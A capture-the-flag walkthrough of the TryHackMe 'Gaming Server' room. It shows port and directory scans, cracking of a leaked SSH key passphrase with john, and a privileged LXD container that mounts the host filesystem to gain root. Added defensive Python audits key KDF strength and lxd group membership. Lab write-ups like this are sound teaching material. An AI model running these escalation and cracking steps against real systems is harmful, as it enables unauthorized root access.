# Gaming Server

**Date:** 11 November, 2021

**Author:** Dhaval Kotak

**Room:** [Gaming Server](https://tryhackme.com/room/gamingserver)

## Port Scanning

```shell
nanomite @ zeus in ~/thm/gaming_server
⚡️ nmap 10.10.19.112 | tee nmap.log
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-11 22:21 IST
Nmap scan report for 10.10.19.112
Host is up (0.21s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 9.16 seconds
```

## Gobuster Scanning

```shell
nanomite @ zeus in ~/thm/gaming_server
⚡️ gobuster dir -u http://10.10.19.112 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.19.112
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/11/11 22:22:38 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/index.html           (Status: 200) [Size: 2762]
/robots.txt           (Status: 200) [Size: 33]  
/secret               (Status: 301) [Size: 313] [--> http://10.10.19.112/secret/]
/server-status        (Status: 403) [Size: 277]                                  
/uploads              (Status: 301) [Size: 314] [--> http://10.10.19.112/uploads/]
           
===============================================================
2021/11/11 22:24:36 Finished
===============================================================
```

## Getting SSH Credentials

### Username

* We find the username `john` in the page source.

### RSA Key

* There is an RSA private key in the `/secret` directory we discovered with gobuster.
* The key is passphrase-protected, so we convert it with ssh2john and then run John the Ripper against the resulting hash to recover the passphrase needed for the SSH login.

```shell
nanomite @ zeus in ~/thm/gaming_server
⚡️ python /opt/john/ssh2John.py id_rsa > hash
nanomite @ zeus in ~/thm/gaming_server
⚡️ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
letmein          (id_rsa)
1g 0:00:00:06 71.47% (ETA: 22:29:46) 0.1658g/s 1697Kp/s 1697Kc/s 1697KC/s alfaris
Session aborted
```
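Why the crack ran at around 1.7M guesses per second: john reports KDF/cipher cost 0 (MD5/AES), meaning the key is in the legacy PEM layout, where the AES key is derived from the passphrase by a single MD5 pass with no stretching. The following Python is an added example (not from the write-up or the room) that inspects a key's header and flags keys that are unencrypted or not protected by the bcrypt KDF of the modern OpenSSH format; the key headers are constructed samples, not real keys.

```python
import base64
import re
import struct

# Constructed sample headers, not real keys. The first is the legacy PEM layout
# whose AES key is derived from the passphrase by one MD5 pass (john's "cost 0");
# the others are modern openssh-key-v1 headers (bcrypt KDF, and unencrypted).
LEGACY_PEM = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,0123456789ABCDEF0123456789ABCDEF

(constructed, truncated base64 body)
-----END RSA PRIVATE KEY-----
"""

def _openssh_header(cipher: bytes, kdf: bytes) -> str:
    # Only the leading fields of an openssh-key-v1 blob: magic, ciphername, kdfname.
    blob = (b"openssh-key-v1\x00" + struct.pack(">I", len(cipher)) + cipher
            + struct.pack(">I", len(kdf)) + kdf)
    body = base64.b64encode(blob).decode()
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{body}\n-----END OPENSSH PRIVATE KEY-----\n"

OPENSSH_BCRYPT = _openssh_header(b"aes256-ctr", b"bcrypt")
OPENSSH_PLAIN = _openssh_header(b"none", b"none")

def classify_ssh_key(pem: str) -> dict:
    """Report key format, whether it is encrypted, and the cipher/KDF protecting it."""
    if "BEGIN OPENSSH PRIVATE KEY" in pem:
        body = "".join(l for l in pem.splitlines() if not l.startswith("-----"))
        raw = base64.b64decode(body)
        if not raw.startswith(b"openssh-key-v1\x00"):
            raise ValueError("bad openssh-key-v1 magic")
        off, fields = len(b"openssh-key-v1\x00"), []
        for _ in range(2):  # ciphername, then kdfname (both length-prefixed strings)
            (n,) = struct.unpack(">I", raw[off:off + 4])
            fields.append(raw[off + 4:off + 4 + n].decode())
            off += 4 + n
        cipher, kdf = fields
        return {"format": "openssh", "encrypted": cipher != "none",
                "cipher": cipher, "kdf": kdf if cipher != "none" else None}
    encrypted = "Proc-Type: 4,ENCRYPTED" in pem
    m = re.search(r"^DEK-Info:\s*([A-Z0-9-]+)", pem, re.M)
    # Legacy PEM: the cipher key comes from MD5(passphrase || salt) with no
    # stretching, so wordlist attacks run at millions of candidates per second.
    return {"format": "pem-legacy", "encrypted": encrypted,
            "cipher": m.group(1) if m else None, "kdf": "md5" if encrypted else None}

def is_weakly_protected(pem: str) -> bool:
    """True unless the key is encrypted under the bcrypt KDF."""
    info = classify_ssh_key(pem)
    return not info["encrypted"] or info["kdf"] != "bcrypt"
```

Keys that report `md5` here should be regenerated with `ssh-keygen -o -a <rounds>` (or any recent ssh-keygen, which emits the bcrypt format by default).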

## SSH Login

* Now we can log in as `john` over SSH with the private key and the passphrase we recovered.
* `user.txt` is sitting right in the home directory.

```shell
nanomite @ zeus in ~/thm/gaming_server
⚡️ ssh john@10.10.19.112 -i id_rsa                      
The authenticity of host '10.10.19.112 (10.10.19.112)' can't be established.
ECDSA key fingerprint is SHA256:LO5bYqjXqLnB39jxUzFMiOaZ1YnyFGGXUmf1edL6R9o.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.19.112' (ECDSA) to the list of known hosts.
Enter passphrase for key 'id_rsa': 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-76-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Nov 11 17:05:39 UTC 2021

  System load:  0.0               Processes:           97
  Usage of /:   41.1% of 9.78GB   Users logged in:     0
  Memory usage: 32%               IP address for eth0: 10.10.19.112
  Swap usage:   0%


0 packages can be updated.
0 updates are security updates.


Last login: Mon Jul 27 20:17:26 2020 from 10.8.5.10
john@exploitable:~$ ls
user.txt
john@exploitable:~$ cat user.txt 
a5c2ff8b9c(REDACTED)ff2f1a5a6e7e
```

* **What is the user flag?**

  a5c2ff8b9c(REDACTED)ff2f1a5a6e7e

## Privilege Escalation

Our user is a member of the `lxd` group, the group that controls LXD (Linux containers) on this host.

```shell
john@exploitable:~$ id
uid=1000(john) gid=1000(john) groups=1000(john),4(adm),24(cdrom),27(sudo),30(dip
),46(plugdev),108(lxd)
```

We can use lxd-alpine-builder on our local machine, which builds a minimal Alpine Linux image, and then import that image into LXD on the target.

* First clone the repository on your machine, then run the Alpine builder script as root to build the image as a tar file.

```shell
nanomite @ zeus in ~/thm/gaming_server
⚡️ git clone https://github.com/saghul/lxd-alpine-builder.git
Cloning into 'lxd-alpine-builder'...
remote: Enumerating objects: 42, done.
remote: Counting objects: 100% (15/15), done.
remote: Compressing objects: 100% (14/14), done.
remote: Total 42 (delta 5), reused 4 (delta 1), pack-reused 27
Receiving objects: 100% (42/42), 3.11 MiB | 650.00 KiB/s, done.
Resolving deltas: 100% (11/11), done.
nanomite @ zeus in ~/thm/gaming_server
⚡️ cd lxd-alpine-builder 
nanomite @ zeus in ~/thm/gaming_server/lxd-alpine-builder on master
⚡️ sudo ./build-alpine 
```

Now start a web server on your attacker machine to transfer the image to the target machine.

```shell
# Your machine
nanomite @ zeus in ~/thm/gaming_server/lxd-alpine-builder on master*
⚡️ python3 -m http.server 5000
Serving HTTP on 0.0.0.0 port 5000 (http://0.0.0.0:5000/) ...
```

```shell
# Target machine
john@exploitable:~$ wget 10.17.14.25:5000/alpine-v3.13-x86_64-20210218_0139.tar.gz
```

Now import the image

```bash
lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage
```

Then spawn the root shell by running the following commands:

```bash
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
```

After that we can find the root flag and read it.
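As an added, defender-side example (not part of the write-up or the room): a small Python audit that checks for the two conditions this escalation relies on, non-root members of the `lxd` (or `docker`) group in `/etc/group`, and a container that is privileged and mounts the host's `/` as a disk device. The `/etc/group` lines and the instance object are constructed samples; the JSON shape follows LXD's instance object as returned by `lxc query /1.0/instances/<name>`, which is an assumption here.

```python
import json

# Constructed sample of /etc/group lines, mirroring the target (john in lxd, gid 108).
ETC_GROUP = """root:x:0:
sudo:x:27:john
docker:x:999:
lxd:x:108:john
john:x:1000:
"""

# Constructed sample in the shape of an LXD instance object (assumed to match
# `lxc query /1.0/instances/<name>`); mirrors the ignite container built above.
INSTANCE_JSON = json.dumps({
    "name": "ignite",
    "config": {"security.privileged": "true"},
    "devices": {"mydevice": {"type": "disk", "source": "/", "path": "/mnt/root"}},
})

# Membership of either group is root-equivalent: the daemon runs as root and
# will create whatever container config the member asks for.
CONTAINER_GROUPS = {"lxd", "docker"}

def container_group_members(etc_group: str) -> dict:
    """Map each root-equivalent group to its non-root members."""
    found = {}
    for line in etc_group.splitlines():
        name, _passwd, _gid, members = line.split(":", 3)
        if name in CONTAINER_GROUPS:
            users = [u for u in members.split(",") if u and u != "root"]
            if users:
                found[name] = users
    return found

def host_escape_findings(instance_json: str) -> list:
    """Flag container config that exposes the host root filesystem as root."""
    inst = json.loads(instance_json)
    findings = []
    if inst.get("config", {}).get("security.privileged") == "true":
        findings.append("security.privileged=true: uid 0 inside is uid 0 on the host")
    for dev, spec in inst.get("devices", {}).items():
        if spec.get("type") == "disk" and spec.get("source") == "/":
            findings.append(f"device {dev!r} mounts host / at {spec.get('path')}")
    return findings
```

In practice, run the group check against the real `/etc/group` and the instance check over every instance returned by `lxc list`; either finding alone is worth an alert, and both together are exactly the path used above.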

* **What is the root flag?**

  2e337b8c9f(REDACTED)8d4e6a7c88fc
